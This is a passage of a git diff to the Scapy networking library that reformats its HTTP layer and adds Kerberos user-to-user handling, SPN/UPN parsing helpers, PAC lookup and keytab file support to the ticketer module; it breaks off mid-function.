"deflate" in encodings: import zlib + s = zlib.decompress(s) elif "gzip" in encodings: s = gzip.decompress(s) @@ -343,16 +348,14 @@ def post_dissect(self, s): s = lzw.decompress(s) else: log_loading.info( - "Can't import lzw. compress decompression " - "will be ignored !" + "Can't import lzw. compress decompression " "will be ignored !" ) elif "br" in encodings: if _is_brotli_available: s = brotli.decompress(s) else: log_loading.info( - "Can't import brotli. brotli decompression " - "will be ignored !" + "Can't import brotli. brotli decompression " "will be ignored !" ) elif "zstd" in encodings: if _is_zstd_available: @@ -378,6 +381,7 @@ def post_build(self, pkt, pay): # Compress if "deflate" in encodings: import zlib + pay = zlib.compress(pay) elif "gzip" in encodings: pay = gzip.compress(pay) @@ -386,24 +390,21 @@ def post_build(self, pkt, pay): pay = lzw.compress(pay) else: log_loading.info( - "Can't import lzw. compress compression " - "will be ignored !" + "Can't import lzw. compress compression " "will be ignored !" ) elif "br" in encodings: if _is_brotli_available: pay = brotli.compress(pay) else: log_loading.info( - "Can't import brotli. brotli compression will " - "be ignored !" + "Can't import brotli. brotli compression will " "be ignored !" ) elif "zstd" in encodings: if _is_zstd_available: pay = zstandard.ZstdCompressor().compress(pay) else: log_loading.info( - "Can't import zstandard. zstd compression will " - "be ignored !" + "Can't import zstandard. zstd compression will " "be ignored !" ) # Chunkify if conf.contribs["http"]["auto_chunk"] and "chunked" in encodings: @@ -412,12 +413,10 @@ def post_build(self, pkt, pay): return pkt + pay def self_build(self, **kwargs): - ''' Takes an HTTPRequest or HTTPResponse object, and creates its - string representation.''' + """Takes an HTTPRequest or HTTPResponse object, and creates its + string representation.""" if not isinstance(self.underlayer, HTTP): - warning( - "An HTTPResponse/HTTPRequest should always be below an HTTP" - ) + warning("An HTTPResponse/HTTPRequest should always be below an HTTP") # Check for cache if self.raw_packet_cache is not None: return self.raw_packet_cache @@ -435,7 +434,7 @@ def self_build(self, **kwargs): val = str(len(self.payload or b"")) elif f.name == "Date" and isinstance(self, HTTPResponse): val = datetime.datetime.now(datetime.timezone.utc).strftime( - '%a, %d %b %Y %H:%M:%S GMT' + "%a, %d %b %Y %H:%M:%S GMT" ) else: # Not specified. Skip @@ -446,9 +445,9 @@ def self_build(self, **kwargs): # Fields used in the first line have a space as a separator, # whereas headers are terminated by a new line if i <= 1: - separator = b' ' + separator = b" " else: - separator = b'\r\n' + separator = b"\r\n" # Add the field into the packet p = f.addfield(self, p, val + separator) # Handle Unknown_Headers @@ -456,28 +455,27 @@ def self_build(self, **kwargs): headers_text = b"" for name, value in self.Unknown_Headers.items(): headers_text += _header_line(name, value) + b"\r\n" - p = self.get_field("Unknown_Headers").addfield( - self, p, headers_text - ) + p = self.get_field("Unknown_Headers").addfield(self, p, headers_text) # The packet might be empty, and in that case it should stay empty. if p: # Add an additional line after the last header - p = f.addfield(self, p, b'\r\n') + p = f.addfield(self, p, b"\r\n") return p def guess_payload_class(self, payload): - """Detect potential payloads - """ + """Detect potential payloads""" if not hasattr(self, "Connection"): return super(_HTTPContent, self).guess_payload_class(payload) if self.Connection and b"Upgrade" in self.Connection: from scapy.contrib.http2 import H2Frame + return H2Frame return super(_HTTPContent, self).guess_payload_class(payload) class _HTTPHeaderField(StrField): """Modified StrField to handle HTTP Header names""" + __slots__ = ["real_name"] def __init__(self, name, default): @@ -503,92 +501,98 @@ def _generate_headers(*args): results.append(_HTTPHeaderField(h, None)) return results + # Create Request and Response packets class HTTPRequest(_HTTPContent): name = "HTTP Request" - fields_desc = [ - # First line - _HTTPHeaderField("Method", "GET"), - _HTTPHeaderField("Path", "/"), - _HTTPHeaderField("Http-Version", "HTTP/1.1"), - # Headers - ] + ( - _generate_headers( - GENERAL_HEADERS, - REQUEST_HEADERS, - COMMON_UNSTANDARD_GENERAL_HEADERS, - COMMON_UNSTANDARD_REQUEST_HEADERS + fields_desc = ( + [ + # First line + _HTTPHeaderField("Method", "GET"), + _HTTPHeaderField("Path", "/"), + _HTTPHeaderField("Http-Version", "HTTP/1.1"), + # Headers + ] + + ( + _generate_headers( + GENERAL_HEADERS, + REQUEST_HEADERS, + COMMON_UNSTANDARD_GENERAL_HEADERS, + COMMON_UNSTANDARD_REQUEST_HEADERS, + ) ) - ) + [ - _HTTPHeaderField("Unknown-Headers", None), - ] + + [ + _HTTPHeaderField("Unknown-Headers", None), + ] + ) def do_dissect(self, s): """From the HTTP packet string, populate the scapy object""" first_line, body = _dissect_headers(self, s) try: - Method, Path, HTTPVersion = re.split(br"\s+", first_line, maxsplit=2) - self.setfieldval('Method', Method) - self.setfieldval('Path', Path) - self.setfieldval('Http_Version', HTTPVersion) + Method, Path, HTTPVersion = re.split(rb"\s+", first_line, maxsplit=2) + self.setfieldval("Method", Method) + self.setfieldval("Path", Path) + self.setfieldval("Http_Version", HTTPVersion) except ValueError: pass if body: - self.raw_packet_cache = s[:-len(body)] + self.raw_packet_cache = s[: -len(body)] else: self.raw_packet_cache = s return body def mysummary(self): - return self.sprintf( - "%HTTPRequest.Method% '%HTTPRequest.Path%' " - ) + return self.sprintf("%HTTPRequest.Method% '%HTTPRequest.Path%' ") class HTTPResponse(_HTTPContent): name = "HTTP Response" - fields_desc = [ - # First line - _HTTPHeaderField("Http-Version", "HTTP/1.1"), - _HTTPHeaderField("Status-Code", "200"), - _HTTPHeaderField("Reason-Phrase", "OK"), - # Headers - ] + ( - _generate_headers( - GENERAL_HEADERS, - RESPONSE_HEADERS, - COMMON_UNSTANDARD_GENERAL_HEADERS, - COMMON_UNSTANDARD_RESPONSE_HEADERS + fields_desc = ( + [ + # First line + _HTTPHeaderField("Http-Version", "HTTP/1.1"), + _HTTPHeaderField("Status-Code", "200"), + _HTTPHeaderField("Reason-Phrase", "OK"), + # Headers + ] + + ( + _generate_headers( + GENERAL_HEADERS, + RESPONSE_HEADERS, + COMMON_UNSTANDARD_GENERAL_HEADERS, + COMMON_UNSTANDARD_RESPONSE_HEADERS, + ) ) - ) + [ - _HTTPHeaderField("Unknown-Headers", None), - ] + + [ + _HTTPHeaderField("Unknown-Headers", None), + ] + ) def answers(self, other): return HTTPRequest in other def do_dissect(self, s): - ''' From the HTTP packet string, populate the scapy object ''' + """From the HTTP packet string, populate the scapy object""" first_line, body = _dissect_headers(self, s) try: - HTTPVersion, Status, Reason = re.split(br"\s+", first_line, maxsplit=2) - self.setfieldval('Http_Version', HTTPVersion) - self.setfieldval('Status_Code', Status) - self.setfieldval('Reason_Phrase', Reason) + HTTPVersion, Status, Reason = re.split(rb"\s+", first_line, maxsplit=2) + self.setfieldval("Http_Version", HTTPVersion) + self.setfieldval("Status_Code", Status) + self.setfieldval("Reason_Phrase", Reason) except ValueError: pass if body: - self.raw_packet_cache = s[:-len(body)] + self.raw_packet_cache = s[: -len(body)] else: self.raw_packet_cache = s return body def mysummary(self): - return self.sprintf( - "%HTTPResponse.Status_Code% %HTTPResponse.Reason_Phrase%" - ) + return self.sprintf("%HTTPResponse.Status_Code% %HTTPResponse.Reason_Phrase%") + # General HTTP class + defragmentation @@ -600,21 +604,24 @@ class HTTP(Packet): clsreq = HTTPRequest clsresp = HTTPResponse hdr = b"HTTP" - reqmethods = b"|".join([ - b"OPTIONS", - b"GET", - b"HEAD", - b"POST", - b"PUT", - b"DELETE", - b"TRACE", - b"CONNECT", - ]) + reqmethods = b"|".join( + [ + b"OPTIONS", + b"GET", + b"HEAD", + b"POST", + b"PUT", + b"DELETE", + b"TRACE", + b"CONNECT", + ] + ) @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt and len(_pkt) >= 9: from scapy.contrib.http2 import _HTTP2_types, H2Frame + # To detect a valid HTTP2, we check that the type is correct # that the Reserved bit is set and length makes sense. while _pkt: @@ -678,7 +685,7 @@ def tcp_reassemble(cls, data, metadata, _): else: # It's not Content-Length based. It could be chunked encodings = http_packet[cls].payload._get_encodings() - chunked = ("chunked" in encodings) + chunked = "chunked" in encodings if chunked: detect_end = lambda dat: dat.endswith(b"0\r\n\r\n") # HTTP Requests that do not have any content, @@ -714,9 +721,12 @@ def guess_payload_class(self, payload): """ try: prog = re.compile( - br"^(?:" + self.reqmethods + br") " + - br"(?:.+?) " + - self.hdr + br"/\d\.\d$" + rb"^(?:" + + self.reqmethods + + rb") " + + rb"(?:.+?) " + + self.hdr + + rb"/\d\.\d$" ) crlfIndex = payload.index(b"\r\n") req = payload[:crlfIndex] @@ -724,7 +734,7 @@ def guess_payload_class(self, payload): if result: return self.clsreq else: - prog = re.compile(b"^" + self.hdr + br"/\d\.\d \d\d\d .*$") + prog = re.compile(b"^" + self.hdr + rb"/\d\.\d \d\d\d .*$") result = prog.match(req) if result: return self.clsresp @@ -822,20 +832,18 @@ def sr1(self, req, **kwargs): **kwargs, ) if self.verb: - print( - conf.color_theme.success( - "<< %s" % (resp and resp.summary()) - ) - ) + print(conf.color_theme.success("<< %s" % (resp and resp.summary()))) return resp - def request(self, - url, - data=b"", - timeout=5, - follow_redirects=True, - http_headers={}, - **headers): + def request( + self, + url, + data=b"", + timeout=5, + follow_redirects=True, + http_headers={}, + **headers, + ): """ Perform a HTTP(s) request. @@ -870,15 +878,13 @@ def request(self, if not http_headers: http_headers = { - "Accept_Encoding": b'gzip, deflate', - "Cache_Control": b'no-cache', - "Pragma": b'no-cache', - "Connection": b'keep-alive', + "Accept_Encoding": b"gzip, deflate", + "Cache_Control": b"no-cache", + "Pragma": b"no-cache", + "Connection": b"keep-alive", } else: - http_headers = { - k.replace("-", "_"): v for k, v in http_headers.items() - } + http_headers = {k.replace("-", "_"): v for k, v in http_headers.items()} http_headers.update(headers) req = HTTP() / HTTPRequest(**http_headers) if data: @@ -886,7 +892,13 @@ def request(self, while True: # Perform the request. - resp = self.sr1(req) + try: + resp = self.sr1(req) + except Exception: + # Socket has died, restart. + self._sockinfo = None + self._connect_or_reuse(host, port=port, tls=tls, timeout=timeout) + continue if not resp: break # First case: auth was required. Handle that @@ -917,8 +929,9 @@ def request(self, if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: raise Scapy_Exception("Authentication failure") req.Authorization = ( - self.authmethod.value.encode() + b" " + - base64.b64encode(bytes(token)) + self.authmethod.value.encode() + + b" " + + base64.b64encode(bytes(token)) ) continue # Second case: follow redirection @@ -939,8 +952,9 @@ def close(self): self.sock.close() -def http_request(host, path="/", port=None, timeout=3, - display=False, tls=False, verbose=0, **headers): +def http_request( + host, path="/", port=None, timeout=3, display=False, tls=False, verbose=0, **headers +): """ Util to perform an HTTP request. @@ -993,6 +1007,7 @@ def http_request(host, path="/", port=None, timeout=3, # Automatons + class HTTP_Server(Automaton): """ HTTP server automaton @@ -1220,9 +1235,7 @@ def answer(self, pkt): return HTTPResponse( Status_Code=b"404", Reason_Phrase=b"Not Found", - ) / ( - "

      404 - Not Found

      " - ) + ) / ("

      404 - Not Found

      ") class HTTPS_Server(HTTP_Server): diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 7fae9f6e40b..f7b0cc19a46 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -202,8 +202,17 @@ class PrincipalName(ASN1_Packet): ASN1F_SEQUENCE_OF("nameString", [], KerberosString, explicit_tag=0xA1), ) + def toString(self): + """ + Convert a PrincipalName back into its string representation. + """ + return "/".join(x.val.decode() for x in self.nameString) + @staticmethod def fromUPN(upn: str): + """ + Create a PrincipalName from a UPN string. + """ user, _ = _parse_upn(upn) return PrincipalName( nameString=[ASN1_GENERAL_STRING(user)], @@ -211,18 +220,27 @@ def fromUPN(upn: str): ) @staticmethod - def fromSPN(spn: bytes): + def fromSPN(spn: str): + """ + Create a PrincipalName from a SPN string. + """ spn, _ = _parse_spn(spn) if spn.startswith("krbtgt"): return PrincipalName( nameString=[ASN1_GENERAL_STRING(x) for x in spn.split("/")], nameType=ASN1_INTEGER(2), # NT-SRV-INST ) - else: + elif "/" in spn: return PrincipalName( nameString=[ASN1_GENERAL_STRING(x) for x in spn.split("/")], nameType=ASN1_INTEGER(3), # NT-SRV-HST ) + else: + # In case of U2U + return PrincipalName( + nameString=[ASN1_GENERAL_STRING(spn)], + nameType=ASN1_INTEGER(1), # NT-PRINCIPAL + ) KerberosTime = ASN1F_GENERALIZED_TIME @@ -281,6 +299,7 @@ def fromSPN(spn: bytes): 0x8003: "KRB-AUTHENTICATOR", # [MS-KILE] 0xFFFFFF76: "MD5", + -138: "MD5", } @@ -601,6 +620,9 @@ class AuthorizationData(ASN1_Packet): "seq", [AuthorizationDataItem()], AuthorizationDataItem ) + def getAuthData(self, adType): + return next((x.adData for x in self.seq if x.adType == adType), None) + AD_IF_RELEVANT = AuthorizationData _AUTHORIZATIONDATA_VALUES[1] = AD_IF_RELEVANT @@ -1308,7 +1330,7 @@ class KRB_Ticket(ASN1_Packet): def getSPN(self): return "%s@%s" % ( - "/".join(x.val.decode() for x in self.sname.nameString), + self.sname.toString(), self.realm.val.decode(), ) @@ -1823,6 +1845,10 @@ def m2i(self, pkt, s): # Some types can also happen in FAST sessions # 18: KDC_ERR_CLIENT_REVOKED return MethodData(val[0].val, _underlayer=pkt), val[1] + elif pkt.errorCode.val == 7: + # This looks like an undocumented structure. + # 7: KDC_ERR_S_PRINCIPAL_UNKNOWN + return KERB_ERROR_UNK(val[0].val, _underlayer=pkt), val[1] raise elif pkt.errorCode.val == 69: # KRB_AP_ERR_USER_TO_USER_REQUIRED @@ -1940,6 +1966,12 @@ class KRB_ERROR(ASN1_Packet): implicit_tag=ASN1_Class_KRB.ERROR, ) + def getSPN(self): + return "%s@%s" % ( + self.sname.toString(), + self.realm.val.decode(), + ) + # PA-FX-ERROR _PADATA_CLASSES[137] = KRB_ERROR @@ -1986,6 +2018,26 @@ class KERB_ERROR_DATA(ASN1_Packet): ) +# This looks like an undocumented structure. + + +class KERB_ERROR_UNK(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "dataType", + 0, + { + -128: "KDC_ERR_MUST_USE_USER2USER", + }, + explicit_tag=0xA0, + ), + ASN1F_STRING("dataValue", None, explicit_tag=0xA1), + ) + ) + + # Kerberos U2U - draft-ietf-cat-user2user-03 @@ -3149,9 +3201,9 @@ def tgs_req(self): padata.append( PADATA( padataType=ASN1_INTEGER(161), # KERB-KEY-LIST-REQ - padataValue=KERB_KEY_LIST_REQ(keytypes=[ - ASN1_INTEGER(x) for x in self.key_list_req - ]) + padataValue=KERB_KEY_LIST_REQ( + keytypes=[ASN1_INTEGER(x) for x in self.key_list_req] + ), ) ) @@ -3408,7 +3460,16 @@ def receive_krb_error_tgs_req(self, pkt): self.receive_krb_error_tgs_req(ferr) return - log_runtime.warning("Received KRB_ERROR") + if ( + pkt.root.errorCode == 0x07 + and isinstance(pkt.root.eData, KERB_ERROR_UNK) + and pkt.root.eData.dataType == -128 + ): + log_runtime.warning( + "KDC requires U2U for SPN '%s' !" % pkt.root.getSPN() + ) + else: + log_runtime.warning("Received KRB_ERROR") pkt.show() raise self.FINAL() @@ -3451,9 +3512,17 @@ def FINAL(self): def _parse_upn(upn): - m = re.match(r"^([^@\\/]+)(@|\\|/)([^@\\/]+)$", upn) + """ + Extract the username and realm from full UPN + """ + m = re.match(r"^([^@\\/]+)(@|\\)([^@\\/]+)$", upn) if not m: - raise ValueError("Invalid UPN: '%s'" % upn) + err = "Invalid UPN: '%s'" % upn + if "/" in upn: + err += ". Did you mean '%s' ?" % upn.replace("/", "\\") + elif "@" not in upn and "\\" not in upn: + err += ". Provide domain as so: '%s@domain.local'" % upn + raise ValueError(err) if m.group(2) == "@": user = m.group(1) domain = m.group(3) @@ -3464,12 +3533,29 @@ def _parse_upn(upn): def _parse_spn(spn): - m = re.match(r"^((?:[^@\\/]+)/(?:[^@\\/]+))(?:@([^@\\/]+))?$", spn) + """ + Extract ServiceName and realm from full SPN + """ + # See [MS-ADTS] sect 2.2.21 for SPN format. We discard the servicename. + m = re.match(r"^((?:[^@\\/]+)/(?:[^@\\/]+))(?:/[^@\\/]+)?(?:@([^@\\/]+))?$", spn) if not m: - raise ValueError("Invalid SPN: '%s'" % spn) + try: + # If SPN is a UPN, we are doing U2U :D + return _parse_upn(spn) + except ValueError: + raise ValueError("Invalid SPN: '%s'" % spn) return m.group(1), m.group(2) +def _spn_are_equal(spn1, spn2): + """ + Check that two SPNs are equal. + """ + spn1, _ = _parse_spn(spn1) + spn2, _ = _parse_spn(spn2) + return spn1.lower() == spn2.lower() + + def krb_as_req( upn, spn=None, ip=None, key=None, password=None, realm=None, host="WIN10", **kwargs ): @@ -3835,12 +3921,12 @@ class KerberosSSP(SSP): Server settings: - :param SPN: the SPN of the service to use + :param SPN: the SPN of the service to use. :param KEY: the kerberos key to use to decrypt the AP-req - :param TGT: (optional) pass a TGT to use for U2U + :param UPN: (optional) the UPN, if used in U2U mode. + :param TGT: (optional) pass a TGT to use for U2U. :param DC_IP: (optional) if TGT is not provided, request one on the KDC at this IP using using the KEY when using U2U. - :param REQUIRE_U2U: (optional, default False) require U2U """ oid = "1.2.840.113554.1.2.2" @@ -3868,6 +3954,9 @@ class CONTEXT(SSP.CONTEXT): "SendSignKeyUsage", "RecvSealKeyUsage", "RecvSignKeyUsage", + # server-only + "UPN", + "PAC", ] def __init__(self, IsAcceptor, req_flags=None): @@ -3880,6 +3969,8 @@ def __init__(self, IsAcceptor, req_flags=None): self.KrbSessionKey = None self.STSessionKey = None self.IsAcceptor = IsAcceptor + self.UPN = None + self.PAC = None # [RFC 4121] sect 2 if IsAcceptor: self.SendSealKeyUsage = 22 @@ -3911,7 +4002,6 @@ def __init__( SPN=None, TGT=None, DC_IP=None, - REQUIRE_U2U=False, SKEY_TYPE=None, debug=0, **kwargs, @@ -3924,7 +4014,6 @@ def __init__( self.PASSWORD = PASSWORD self.U2U = U2U self.DC_IP = DC_IP - self.REQUIRE_U2U = REQUIRE_U2U self.debug = debug if SKEY_TYPE is None: from scapy.libs.rfc3961 import EncryptionType @@ -4519,26 +4608,28 @@ def GSS_Init_sec_context( else: raise ValueError("KerberosSSP: Unknown state") - def _setup_u2u(self): - if not self.TGT: - # Get a TGT for ourselves - try: - upn = "@".join(self.SPN.split("/")[1].split(".", 1)) - except KeyError: - raise ValueError("Couldn't transform the SPN into a valid UPN") - res = krb_as_req(upn, self.DC_IP, key=self.KEY) - self.TGT, self.KEY = res.asrep.ticket, res.sessionkey - def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if Context is None: # New context Context = self.CONTEXT(IsAcceptor=True, req_flags=0) from scapy.libs.rfc3961 import Key + import scapy.layers.msrpce.mspac # noqa: F401 if Context.state == self.STATE.INIT: - if not self.SPN: - raise ValueError("Missing SPN attribute") + if self.UPN and self.SPN: + raise ValueError("Cannot use SPN and UPN at the same time !") + if self.SPN and self.TGT: + raise ValueError("Cannot use TGT with SPN.") + if self.UPN and not self.TGT: + # UPN is provided: use U2U + res = krb_as_req( + self.UPN, + self.DC_IP, + key=self.KEY, + password=self.PASSWORD, + ) + self.TGT, self.KEY = res.asrep.ticket, res.sessionkey # Server receives AP-req, sends AP-rep if isinstance(val, KRB_AP_REQ): # Raw AP_REQ was passed @@ -4549,13 +4640,16 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): ap_req = val.root.innerToken.root except AttributeError: try: - # Raw Kerberos - ap_req = val.root + # Kerberos + ap_req = val.innerToken.root except AttributeError: - return Context, None, GSS_S_DEFECTIVE_TOKEN + try: + # Raw kerberos + ap_req = val.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN if isinstance(ap_req, KRB_TGT_REQ): # Special U2U case - self._setup_u2u() Context.U2U = True return ( None, @@ -4575,17 +4669,9 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): raise ValueError("Unexpected type in KerberosSSP") if not self.KEY: raise ValueError("Missing KEY attribute") - # Validate SPN - tkt_spn = "/".join( - x.val.decode() for x in ap_req.ticket.sname.nameString[:2] - ).lower() - if tkt_spn not in [self.SPN.lower(), self.SPN.lower().split(".", 1)[0]]: - warning("KerberosSSP: bad SPN: %s != %s" % (tkt_spn, self.SPN)) - return Context, None, GSS_S_BAD_MECH - # Enforce U2U if required - if self.REQUIRE_U2U and ap_req.apOptions.val[1] != "1": # use-session-key + # If using a UPN, require U2U + if self.UPN and ap_req.apOptions.val[1] != "1": # use-session-key # Required but not provided. Return an error - self._setup_u2u() Context.U2U = True now_time = datetime.now(timezone.utc).replace(microsecond=0) err = KRB_GSSAPI_Token( @@ -4603,6 +4689,12 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): ) ) return Context, err, GSS_S_CONTINUE_NEEDED + # Validate the 'serverName' of the ticket. + sname = ap_req.ticket.getSPN() + our_sname = self.SPN or self.UPN + if not _spn_are_equal(our_sname, sname): + warning("KerberosSSP: bad server name: %s != %s" % (sname, our_sname)) + return Context, None, GSS_S_BAD_MECH # Decrypt the ticket try: tkt = ap_req.ticket.encPart.decrypt(self.KEY) @@ -4622,6 +4714,13 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): ) ) return Context, err, GSS_S_DEFECTIVE_TOKEN + # Store information about the user in the Context + if tkt.authorizationData and tkt.authorizationData.seq: + # Get AD-IF-RELEVANT + adIfRelevant = tkt.authorizationData.getAuthData(0x1) + if adIfRelevant: + # Get AD-WIN2K-PAC + Context.PAC = adIfRelevant.getAuthData(0x80) # Get AP-REP session key Context.STSessionKey = tkt.key.toKey() authenticator = ap_req.authenticator.decrypt(Context.STSessionKey) diff --git a/scapy/layers/msrpce/mspac.py b/scapy/layers/msrpce/mspac.py index 64608f919eb..0c0b8fc4ec9 100644 --- a/scapy/layers/msrpce/mspac.py +++ b/scapy/layers/msrpce/mspac.py @@ -869,5 +869,14 @@ class PACTYPE(Packet): _PACTYPEPayloads("Payloads", [], None), ] + def getPayload(self, ulType): + """ + Get a payload if it exists. + """ + for i, buf in enumerate(self.Buffers): + if buf.ulType == ulType: + return self.Payloads[i] + return None + _AUTHORIZATIONDATA_VALUES[128] = PACTYPE # AD-WIN2K-PAC diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index d036c5bf8be..5746d538186 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -483,18 +483,18 @@ def update_smbheader(self, pkt): # DEV: add a condition on NEGOTIATED with prio=0 @ATMT.condition(NEGOTIATED, prio=1) - def should_send_setup_andx_request(self, ssp_tuple): + def should_send_session_setup_request(self, ssp_tuple): _, _, negResult = ssp_tuple if negResult not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: raise ValueError("Internal error: the SSP completed with an error.") - raise self.SENT_SETUP_ANDX_REQUEST().action_parameters(ssp_tuple) + raise self.SENT_SESSION_REQUEST().action_parameters(ssp_tuple) @ATMT.state() - def SENT_SETUP_ANDX_REQUEST(self): + def SENT_SESSION_REQUEST(self): pass - @ATMT.action(should_send_setup_andx_request) - def send_setup_andx_request(self, ssp_tuple): + @ATMT.action(should_send_session_setup_request) + def send_setup_session_request(self, ssp_tuple): self.session.sspcontext, token, negResult = ssp_tuple if self.SMB2 and negResult == GSS_S_CONTINUE_NEEDED: # New session: force 0 @@ -541,8 +541,8 @@ def send_setup_andx_request(self, ssp_tuple): bytes(pkt[SMB2_Header]), # session request ) - @ATMT.receive_condition(SENT_SETUP_ANDX_REQUEST) - def receive_setup_andx_response(self, pkt): + @ATMT.receive_condition(SENT_SESSION_REQUEST) + def receive_session_setup_response(self, pkt): if ( SMBSession_Null in pkt or SMBSession_Setup_AndX_Response_Extended_Security in pkt diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 83c11c623ae..9577c934392 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -14,10 +14,11 @@ from datetime import datetime, timedelta, timezone import collections +import enum import platform -import struct import random import re +import struct from scapy.asn1.asn1 import ( ASN1_BIT_STRING, @@ -31,10 +32,12 @@ from scapy.error import log_interactive from scapy.fields import ( ByteField, + ConditionalField, FieldLenField, FlagsField, IntEnumField, IntField, + MayEnd, PacketField, PacketListField, ShortEnumField, @@ -57,15 +60,18 @@ KerberosSSP, PrincipalName, TransitedEncoding, - kpasswd, - krb_as_req, - krb_tgs_req, - _AD_TYPES, _ADDR_TYPES, + _AD_TYPES, _KRB_E_TYPES, _KRB_S_TYPES, _PRINCIPAL_NAME_TYPES, _TICKET_FLAGS, + _parse_spn, + _parse_upn, + kpasswd, + krb_as_req, + krb_get_salt, + krb_tgs_req, ) from scapy.layers.msrpce.mspac import ( CLAIM_ENTRY, @@ -275,6 +281,94 @@ class CCache(Packet): ] +# Keytab +# https://web.mit.edu/kerberos/krb5-devel/doc/formats/keytab_file_format.html (official but garbage) +# https://www.gnu.org/software/shishi/manual/html_node/The-Keytab-Binary-File-Format.html (great) + + +class KTCountedOctetString(Packet): + fields_desc = [ + FieldLenField("length", None, length_of="data", fmt="H"), + StrLenField("data", b"", length_from=lambda pkt: pkt.length), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class KTKeyBlock(Packet): + fields_desc = [ + ShortEnumField("keytype", 0, _KRB_E_TYPES), + FieldLenField("keylen", None, length_of="keyvalue"), + StrLenField("keyvalue", b"", length_from=lambda pkt: pkt.keylen), + ] + + def toKey(self): + return Key(self.keytype, key=self.keyvalue) + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class KeytabEntry(Packet): + fields_desc = [ + IntField("size", None), + FieldLenField("num_components", None, count_of="components"), + PacketField("realm", KTCountedOctetString(), KTCountedOctetString), + PacketListField( + "components", + [], + KTCountedOctetString, + count_from=lambda pkt: pkt.num_components, + ), + ConditionalField( + IntField("name_type", 0), + lambda pkt: pkt.parent.file_format_version != 0x501, + ), + UTCTimeField("timestamp", None), + ByteField("vno8", 0), + MayEnd(PacketField("key", KTKeyBlock(), KTKeyBlock)), + ConditionalField( + IntField("vno", None), + lambda pkt: "vno" in pkt.fields is not None or pkt.original, + ), + ] + + def getPrincipal(self): + comp = "/".join(x.data.decode() for x in self.components) + if self.realm.data: + return "%s@%s" % ( + comp, + self.realm.data.decode(), + ) + else: + return comp + + @property + def versionNumber(self): + if self.vno is not None: + return self.vno + return self.vno8 + + def post_build(self, p, pay): + # type: (bytes, bytes) -> bytes + if self.size is None: + p = struct.pack("!I", len(p)) + p[4:] + return p + pay + + def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, bytes] + rem = self.size - len(self.original) + return s[:rem], s[rem:] + + +class Keytab(Packet): + fields_desc = [ + ShortField("file_format_version", 0x502), + PacketListField("entries", [], KeytabEntry), + ] + + # TK scrollFrame (MPL-2.0) # Credits to @mp035 # https://gist.github.com/mp035/9f2027c3ef9172264532fcd6262f3b01 @@ -345,48 +439,71 @@ def onLeave(self, event): class Ticketer: def __init__(self): self._data = collections.defaultdict(dict) - self.fname = None + self.ccache_fname = None self.ccache = CCache() + self.keytab_fname = None + self.keytab = Keytab() self.hashes_cache = collections.defaultdict(dict) - def open_file(self, fname): + def open_ccache(self, fname): """ - Load CCache from file + Load from CCache file """ - self.fname = fname + self.ccache_fname = fname self.hashes_cache = collections.defaultdict(dict) - with open(self.fname, "rb") as fd: + with open(self.ccache_fname, "rb") as fd: self.ccache = CCache(fd.read()) - def save(self, fname=None, i=None): + def open_keytab(self, fname): + """ + Load from Keytab file + """ + self.keytab_fname = fname + with open(self.keytab_fname, "rb") as fd: + self.keytab = Keytab(fd.read()) + + def save_ccache(self, fname=None, i=None): """ - Save opened CCache file + Save ccache into file :param fname: if provided, save to a specific file. :param i: if provided, only save the ticket n°i. """ if fname: - self.fname = fname - if not self.fname: + self.ccache_fname = fname + if not self.ccache_fname: raise ValueError("No file opened. Specify the 'fname' argument !") + + # If i is specified, extract single ticket. if i is not None: ccache = self.ccache.copy() ccache.credentials = [ccache.credentials[i]] - data = bytes(ccache) else: - data = bytes(self.ccache) - with open(self.fname, "wb") as fd: - return fd.write(data) + ccache = self.ccache + + # Write + with open(self.ccache_fname, "wb") as fd: + return fd.write(bytes(ccache)) + + def save_keytab(self, fname=None): + """ + Save keytab into file + + :param fname: if provided, save to a specific file. + """ + if fname: + self.keytab_fname = fname + if not self.keytab_fname: + raise ValueError("No file opened. Specify the 'fname' argument !") + + # Write + with open(self.keytab_fname, "wb") as fd: + return fd.write(bytes(self.keytab)) def show(self, utc=False): """ Show the content of a CCache """ - if not self.ccache.credentials: - print("No tickets in CCache !") - return - else: - print("Tickets:") def _to_str(x): if x is None: @@ -395,6 +512,32 @@ def _to_str(x): x = datetime.fromtimestamp(x, tz=timezone.utc if utc else None) return x.strftime("%d/%m/%y %H:%M:%S") + # Show Keytab + if self.keytab.entries: + print("Keytab name: %s" % (self.keytab_fname or "UNSAVED")) + print( + pretty_list( + [ + ( + entry.getPrincipal(), + _to_str(entry.timestamp), + str(entry.versionNumber), + entry.key.sprintf("%keytype%"), + ) + for entry in self.keytab.entries + ], + [("Principal", "Timestamp", "KVNO", "Keytype")], + ) + ) + print() + + # Show CCache + if not self.ccache.credentials: + print("No tickets in CCache.") + return + else: + print("CCache tickets:") + for i, cred in enumerate(self.ccache.credentials): if cred.keyblock.keytype == 0: continue @@ -577,18 +720,146 @@ def export_krb(self, i): cred.server.toPN(), ) - def ssp(self, i): + def add_cred( + self, + principal, + mapupn=None, + password=None, + salt=None, + key=None, + etypes=None, + kvno=None, + ): """ - Create a KerberosSSP from a ticket + Add a credential to the Keytab. """ - ticket, sessionkey, upn, spn = self.export_krb(i) - return KerberosSSP( - ST=ticket, - KEY=sessionkey, - UPN=upn, - SPN=spn, + if password and key: + raise ValueError("Please provide 'password' OR 'key'.") + elif not password and not key: + try: + 